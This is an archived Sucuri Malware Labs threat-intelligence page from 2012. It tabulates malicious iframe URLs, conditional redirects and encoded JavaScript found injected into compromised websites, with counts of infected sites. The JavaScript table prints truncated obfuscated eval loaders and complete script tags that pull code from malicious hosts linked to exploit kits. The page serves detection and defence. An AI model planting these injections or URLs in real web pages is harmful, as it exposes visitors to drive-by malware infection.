Sucuri Malware Labs

Sucuri on Twitter Sucuri on Facebook Sucuri on LinkedIn

Historic malware entries for 2012-07-22Home  |  Notes  |  Malware data  |  Signatures  |  Tools  |  About

      Archived data:   Latest   |   2013-05-15   |   2013-05-14   |   2013-05-13   |   2013-05-12   |   2013-05-07   |   2013-05-02   |   2013-05-01   |   2013-04-29   |   More days

We separate the data in three categories: Iframes, redirectiors and javascript. For each one you can click on the domain for more information, IP addresses and details on the malware.

Hidden iframes

Latest hidden iframes our scanner have identified on compromised web sites.

# of sites infectedTypeMalware / Domains
455iframehttp://atomiality.ru/in.cgi?16
418iframehttp://pinkium.ru/in.cgi?16
254iframehttp://orangeroller.ru/in.cgi?16
172iframehttp://competechart.ru/in.cgi?16
90iframehttp://slapfeatureladen.info/in.cgi?16
88iframehttp://playart.org/sites/stats.php
87iframehttp://niu-sae.com/stats.php
34iframehttp://methuenedge.com/stats.php
25iframehttp://smuss.net/redirect.php
19iframehttp://torvaldscallthat.info/in.cgi?16
18iframehttp://flipsphere.ru/in.cgi?16
17iframehttp://greenpillar.ru/in.cgi?16
13iframehttp://whitecada.ru/in.cgi?16
12iframehttp://rolyjyl.ru/count30.php
10iframehttp://transcriptsdelivers.org/news.php?id=e6f6402caf60df3a
9iframehttp://amberuoso.ru/in.cgi?16
8iframehttp://poseyhumane.org/stats.php
6iframehttp://orangemoth.ru/in.cgi?16
6iframehttp://cabaniaseleden.com.ar/stats.php
5iframehttp://greencricket.ru/in.cgi?16
3iframehttp://uploadingbefuddling.org/in.cgi?16
1iframehttp://takenames.cn/st/go.php?sid=1
1iframehttp://p3d.in/e/pBUft/spin/
1iframehttp://lop3.info/mazontms/redirect.php'
1iframehttp://health-drugshop.com/script.php
Limited view (40 rows)... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infectedTypeMalware / Domains
112redirectionshttp://2010service.ru/in.cgi?8
101redirectionshttp://services-2010.ru/in.cgi?8
77redirectionshttp://atomiality.ru/in.cgi?16
70redirectionshttp://2010-service.ru/in.cgi?8
64redirectionshttp://pinkium.ru/in.cgi?16
60redirectionshttp://2011-service.ru/in.cgi?9
52redirectionshttp://service2011.ru/in.cgi?8
37redirectionshttp://services2011.ru/in.cgi?8
34redirectionshttp://niu-sae.com/stats.php
33redirectionshttp://service-2011.ru/in.cgi?8
32redirectionshttp://michaelmazur.net/xml.php
20redirectionshttp://moungust.ru/in.cgi?9
18redirectionshttp://services-2010.ru/in.cgi?8
18redirectionshttp://methuenedge.com/stats.php
17redirectionshttp://2010service.ru/in.cgi?8
16redirectionshttp://pinkium.ru/in.cgi?16
16redirectionshttp://competechart.ru/in.cgi?16
15redirectionshttp://ww2.myjobresumeonline.com/main.php?page=3081100e9fdaf127
14redirectionshttp://udzycaf.ru/count22.php
14redirectionshttp://orangeroller.ru/in.cgi?16
14redirectionshttp://mercurytutors.com/stats.php
13redirectionshttp://atomiality.ru/in.cgi?16
10redirectionshttp://service2011.ru/in.cgi?8
10redirectionshttp://redinter.ru/in.cgi?8
10redirectionshttp://2010-service.ru/in.cgi?8
9redirectionshttp://pdabattery.net/ads/counter.php
9redirectionshttp://daliachuqimaysa.ru/gluce/index.php
9redirectionshttp://2011-service.ru/in.cgi?9
8redirectionshttp://onebelay.ru/bio/invest.php
7redirectionshttp://services2011.ru/in.cgi?8
7redirectionshttp://osmuryf.ru/count19.php
7redirectionshttp://inter4you.ru/in.cgi?8
7redirectionshttp://bronzesage.ru/in.cgi?16
6redirectionshttp://vlagskiper.ru/yazik?12
6redirectionshttp://setatg-ghwoo.ru/ureoy?7
6redirectionshttp://preez-may.ru/infinity?8
6redirectionshttp://fida-talos.ru/maver?12
6redirectionshttp://competechart.ru/in.cgi?16
6redirectionshttp://adaptergins.ru/sunreal?9
5redirectionshttp://www.online-open.com/
Limited view (40 rows)... Only the top entries being displayed.

Encoded javascript

Encoded javascript (redirecting to blackhole and other exploit kits) or to build a remote call.

# of sites infectedTypeMalware / Domains
47javascript<script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110...
23javascript<script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="117..100..918..1170..990..990..1044..1...
23javascript<script src="http://linuxme.gotdns.org/rss.js"></script>
20javascript<script>var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf...
20javascript<script>try{Math.roundd();}catch(qw){try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="117.10...
19javascript<script type="text/javascript">document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l...
18javascript<script>i=0;try{prototype;}catch(egewgsd){h="harCode";f=['-32b-32b64b61b-9b-1b59b70b58b76b68b60...
17javascript<script>try{1-prototype;}catch(asd){x=2;} if(x){fr="fromChar";f=[0,-1,94,93,22,29,91,101,88,108...
16javascript<script>try{12+prototype;}catch(zxc){e=window["eva"+"l"];n="117.100.900.1110.891.1170.981.1010....
14javascript<script>var url="http://appmaker.com.au/wp-includes/pomo/ro.php";if((navigator.userAgent.toLowe...
14javascript<script>i=0;try{prototype;}catch(z){h="harCode";f=['-33c-33c63c60c-10c-2c58c69c57c75c67c59c68c7...
12javascript<script type="text/javascript">document.write('<iframe src="http://rolyjyl.ru/count30.php" name...
12javascript<script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt...
12javascript<script>if(window.document)a=("urf3".split+'352').substr(0,6);aa=(Date+{}).substr(0,6);if(a===a...
11javascript<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2...
11javascript<script src="http://linuxme.gotdns.org/rss.js"></script><script src="http://linuxme.gotdns.org/...
11javascript<script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['crea...
10javascript<script type="text/javascript">function get_cookie(Name) { var search = Name + "="; var returnv...
10javascript<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prot...
10javascript<script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="117..100..918..1170..990..990..1044..1...
10javascript<script src="http://downloadku.in/js/anonymize.php" type="text/javascript"></script>
9javascript<script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="117..100..918..1170..990..990..1044..1...
8javascript<script type="text/javascript" src="http://casadorinmo.com/jq.js"></script>
8javascript<script type="text/javascript" language="JavaScript"><!-- document.write (unescape ('%3cscript...
8javascript<script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110...
8javascript<script>try{eval("pro"+"totype")>0;}catch(zxc){e=eval;n="81..90..945..1020..288..400..900..1110...
8javascript<script src="http://onsu46mersc.rr.nu/pmg.php?d=x"></script>
8javascript<script src="http://lea48ssur.rr.nu/pmg.php?d=x"></script>
8javascript<script src="http://angu48larf.rr.nu/pmg.php?d=x"></script>
8javascript<script language="javascript" type="text/javascript" src="http://js.users.51.la/4387405.js"></s...
8javascript<script charset="windows-1251" type="text/javascript" src="http://www.ozon.ru/PartnerTwinerNew....
7javascript<script type="text/javascript">function get_cookie(Name) { var search = Name + "="; var returnv...
7javascript<script src="http://dadur05ingerr.rr.nu/pmg.php?d=x"></script>
7javascript<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try...
6javascript<script type="text/javascript">document.write('<iframe style="visibility: hidden;" width="1" he...
6javascript<script>try{prototype>0;}catch(zxc){e=window["eva"+"l"];n="81..90..945..1020..288..400..900..11...
6javascript<script>ti='.c';ai='af';qo='p';jn='htm';rf='n';tf='doz';yn='ifr';xm='s';cl='o';jd='k9';nn='tv.'...
6javascript<script src="http://muni42stbul.rr.nu/pmg.php?d=x"></script>
6javascript<script src="http://min72anc.rr.nu/pmg.php?d=x"></script>
6javascript<script src="http://ionse12rving.rr.nu/pmg.php?d=x"></script>
Limited view (40 rows)... Only the top entries being displayed.